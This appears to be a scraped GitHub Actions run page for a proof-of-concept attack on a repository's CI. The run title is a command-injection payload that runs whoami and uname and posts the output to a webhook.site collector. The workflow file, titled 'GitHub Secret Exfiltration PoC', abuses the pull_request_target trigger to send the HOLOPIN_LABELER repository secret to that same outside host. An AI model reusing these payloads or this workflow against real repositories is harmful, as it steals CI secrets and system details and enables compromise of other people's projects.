Skip to content

echo HACKED; curl -X POST https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1 -H "Content-Type: text/plain" --data "$(whoami && uname -a)" #7

echo HACKED; curl -X POST https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1 -H "Content-Type: text/plain" --data "$(whoami && uname -a)"

echo HACKED; curl -X POST https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1 -H "Content-Type: text/plain" --data "$(whoami && uname -a)" #7

Workflow file for this run

name: GitHub Secret Exfiltration PoC
on:
pull_request_target:
types: [opened]
jobs:
exploit:
runs-on: ubuntu-latest
steps:
- name: Show that the PoC workflow is running
run: echo "[+] Workflow triggered by PR from fork"
- name: Try to exfiltrate HOLOPIN_LABELER secret
run: |
echo "[+] Sending secret to Webhook.site..."
curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "token=${{ secrets.HOLOPIN_LABELER }}" \
https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1